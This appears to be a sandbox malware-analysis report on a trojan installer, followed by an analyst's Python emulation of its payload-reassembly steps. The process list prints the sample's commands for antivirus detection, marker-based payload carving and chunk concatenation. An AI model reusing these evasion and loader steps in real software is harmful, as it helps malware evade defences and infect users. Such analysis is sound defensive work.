                    Source: Eco.pif, 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, is-RI2MT.tmp.1.dr String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.dr String found in binary or memory: https://www.globalsign.com/repository/0
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.dr String found in binary or memory: https://www.globalsign.com/repository/03
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1634957326.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1633297447.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000000.1636308762.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Setup.exe, 00000002.00000003.1657177006.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.1654004225.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000000.1660124095.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Setup.tmp.2.dr, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.dr String found in binary or memory: https://www.innosetup.com/
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1634957326.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1633297447.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000000.1636308762.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Setup.exe, 00000002.00000003.1657177006.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.1654004225.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000000.1660124095.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Setup.tmp.2.dr, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.dr String found in binary or memory: https://www.remobjects.com/ps
                    Source: C:\StrLocalGate\MmReveals.exe Code function: 3_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00584614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00584416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                    Source: C:\StrLocalGate\MmReveals.exe Code function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0059CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00530D68 FindCloseChangeNotification,NtResumeThread
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005740C1: CreateFileW,DeviceIoControl,CloseHandle
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00568D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                    Source: C:\StrLocalGate\MmReveals.exe Code function: 3_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005755E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\StrLocalGate\MmReveals.exe Code function: 3_2_0040497C
                    Source: C:\StrLocalGate\MmReveals.exe Code function: 3_2_00406ED2
                    Source: C:\StrLocalGate\MmReveals.exe Code function: 3_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0051B020
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005194E0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00519C80
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005981C8
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00532325
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00546432
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0054258E
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0051E6F0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0053275A
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00590802
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005488EF
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005469A4
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00520BE0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0056EB95
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00590C7F
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0053CC81
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00578CB1
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00546F16
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005332E9
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0053F339
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0052D457
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0052F57E
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005315E4
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00511663
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0051F6A0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005377F3
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0053DAD5
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00531AD8
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00549C15
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0052DD14
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00531EF0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0053BF06
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe Code function: 20_2_00D5DC74
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: String function: 00521A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: String function: 00538A60 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: String function: 00530C42 appears 70 times
                    Source: C:\StrLocalGate\MmReveals.exe Code function: String function: 004062A3 appears 57 times
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: Setup.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1668432847.0000000002358000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1633297447.00000000027DA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1634957326.000000007FE36000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000000.1630689613.00000000004C6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe Binary or memory string: OriginalFileName vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: is-RISCU.tmp.1.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
                    Source: classification engine Classification label: mal72.troj.spyw.evad.winEXE@34/46@1/1
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0057A51A GetLastError,FormatMessageW
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00568BCC AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_0056917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\StrLocalGate\MmReveals.exe Code function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_00573FB5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification
                    Source: C:\StrLocalGate\MmReveals.exe Code function: 3_2_004024FB CoCreateInstance
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif Code function: 14_2_005742AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp File created: C:\Program Files (x86)\StrLocalGate
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp File created: C:\Users\user\AppData\Local\Programs
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe File created: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\StrLocalGate\MmReveals.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe ReversingLabs: Detection: 36%
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeFile read: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe "C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp "C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp" /SL5="$10422,3479677,781312,C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Process created: C:\Program Files (x86)\StrLocalGate\Setup.exe "C:\Program Files (x86)\StrLocalGate\Setup.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Process created: C:\StrLocalGate\MmReveals.exe "C:\StrLocalGate\MmReveals.exe"
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Process created: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp "C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp" /SL5="$20426,920064,920064,C:\Program Files (x86)\StrLocalGate\Setup.exe"
                    Source: C:\StrLocalGate\MmReveals.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 154571
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TRUEANALOGMINDOC" Pepper
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Lt + Blake + Tranny + Category 154571\i
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\154571\Eco.pif 154571\Eco.pif 154571\i
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Process created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Process created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp "C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp" /SL5="$10422,3479677,781312,C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Process created: C:\Program Files (x86)\StrLocalGate\Setup.exe "C:\Program Files (x86)\StrLocalGate\Setup.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Process created: C:\StrLocalGate\MmReveals.exe "C:\StrLocalGate\MmReveals.exe"
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Process created: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp "C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp" /SL5="$20426,920064,920064,C:\Program Files (x86)\StrLocalGate\Setup.exe"
                    Source: C:\StrLocalGate\MmReveals.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 154571
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TRUEANALOGMINDOC" Pepper
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Lt + Blake + Tranny + Category 154571\i
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\154571\Eco.pif 154571\Eco.pif 154571\i
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Process created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Process created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
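Rebuilding what the chain produced: `findstr /V "TRUEANALOGMINDOC" Pepper` emits every line of Pepper that does not contain the marker, so the marker-bearing padding lines are dropped and the payload bytes between them survive. The redirection target is not visible in findstr's own command line; that cmd.exe is the process which created 154571\Eco.pif in the Persistence section below suggests the carved file is Eco.pif, which is an inference, not something the report states. `copy /b Lt + Blake + Tranny + Category 154571\i` then splices four dropped chunks byte-for-byte, in command-line order, into the file Eco.pif is given as its argument. The Python below is an added example for redoing both steps offline from a dump of the dropped files; it is not Joe Sandbox code, and PEPPER and CHUNKS are constructed stand-ins because the real files are not on this page. Two caveats a practitioner should keep in mind: real findstr is line-oriented and can rewrite line endings on binary input, so the emulated output must be hash-compared with the dropped Eco.pif before it is trusted; and the report does not say what Eco.pif is. A renamed interpreter taking a concatenated script as its argument is the shape of the widely documented AutoIt-based loaders, which should be confirmed from the dropped file's strings rather than assumed.

```python
"""Rebuild the two files the report's cmd.exe chain produced.

Added example, not Joe Sandbox code. `findstr /V "MARKER" file` keeps
only the lines that do not contain MARKER; `copy /b a + b + c dest`
concatenates the sources byte-for-byte. PEPPER and CHUNKS below are
constructed stand-ins for the dropped files, which are not on the page.
"""
import hashlib
import re
import struct

MARKER = b"TRUEANALOGMINDOC"  # marker from the report's findstr /V command line
COPY_B_RE = re.compile(r"\bcopy\s+/b\s+(.+?)\s+(\S+)\s*$", re.I)


def findstr_v(data: bytes, marker: bytes) -> bytes:
    """Emulate `findstr /V "marker" file`: drop every line containing marker.

    Assumption: LF separates lines and kept lines are copied verbatim. Real
    findstr is line-oriented and may rewrite line endings on binary input,
    so hash-compare the result with the dropped file before trusting it.
    """
    return b"\n".join(line for line in data.split(b"\n") if marker not in line)


def parse_copy_b(cmdline: str) -> tuple[list[str], str]:
    """Return (sources in order, destination) of a `copy /b` command line."""
    m = COPY_B_RE.search(cmdline)
    if m is None:
        raise ValueError(f"not a copy /b command: {cmdline}")
    return [s.strip() for s in m.group(1).split("+")], m.group(2)


def copy_b(cmdline: str, files: dict[str, bytes]) -> tuple[str, bytes]:
    """Emulate `copy /b`: splice the named chunks in command-line order."""
    sources, dest = parse_copy_b(cmdline)
    return dest, b"".join(files[name] for name in sources)


def looks_like_pe(data: bytes) -> bool:
    """True if data has an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def _fake_pe() -> bytes:
    """Minimal MZ/PE header stub (constructed; not the sample's bytes)."""
    hdr = bytearray(0x44)
    hdr[0:2] = b"MZ"
    hdr[0x20] = 0x0A  # a stray LF inside the image, so padding can sit on a line boundary
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr)


FAKE_PE = _fake_pe()
PADDING_LINE = MARKER + b" filler that bloats the file and defeats hash matching\r\n"
# "Pepper" as the loader ships it: payload bytes interleaved with marker lines.
PEPPER = PADDING_LINE + FAKE_PE[:0x21] + PADDING_LINE + FAKE_PE[0x21:]

# Stand-ins for the four dropped chunks named on the copy /b command line.
CHUNKS = {"Lt": b"#part-1\r\n", "Blake": b"#part-2\r\n",
          "Tranny": b"#part-3\r\n", "Category": b"#part-4\r\n"}
COPY_CMD = r"cmd /c copy /b Lt + Blake + Tranny + Category 154571\i"


def rebuild() -> dict[str, bytes]:
    """Run both carving steps; map destination name to rebuilt bytes.

    Naming the findstr output Eco.pif is an inference: the redirection target
    is not in findstr's command line, but cmd.exe is the process that created
    154571\\Eco.pif in the report's Persistence section.
    """
    carved = findstr_v(PEPPER, MARKER)
    dest, script = copy_b(COPY_CMD, CHUNKS)
    return {r"154571\Eco.pif": carved, dest: script}


if __name__ == "__main__":
    for name, blob in rebuild().items():
        digest = hashlib.sha256(blob).hexdigest()
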